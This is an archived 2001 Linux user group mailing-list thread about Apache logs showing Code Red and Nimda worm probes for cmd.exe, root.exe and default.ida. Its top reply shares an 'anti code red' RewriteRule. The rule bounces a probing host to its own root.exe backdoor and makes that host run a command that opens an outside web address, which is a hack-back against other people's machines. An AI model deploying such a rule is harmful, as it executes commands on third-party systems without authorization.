Read about the ANTI CODE RED SCHEME at: http://24.17.180.183/anticodered.txt Basically, it as the following RewriteRule: RewriteRule ^(.*)/default.ida(.*) http://%{REMOTE_ADDR}/c/inetpub/scripts/root.exe?/c+start+http://24.17.180.183/anticodered.html Jim On Tue, 30 Oct 2001, Marc A. Ohmann wrote: > Date: Tue, 30 Oct 2001 23:36:08 -0600 > From: Marc A. Ohmann <marc at ds6.net> > Reply-To: tclug-list at mn-linux.org > To: tclug-list at mn-linux.org > Subject: Re: [TCLUG] Apache error logs > > Join the club. By last count I have 71,000 of those in my access_logs. And just over 2000 unique IPs. .exes are Nimda, Code Red [I and II] just looked for default.ida. IIRC > > On Tue, Oct 30, 2001 at 08:36:34PM -0600, Munir Nassar wrote: > > For a couple of days now i have been getting wierd errors in my Apache > > logs, mostly people doing a GET /dir/cmd.exe, or root.exe > > > > don't these people check the server strings? I may be inexperienced but i > > am not brain dead enough to run IIS. or just even plain windows. > > > > but most importantly: should i report the IPs to someone? (i have about 10 > > different IPs so far) is there anything in particular i should do about > > this? > > > > -munir > >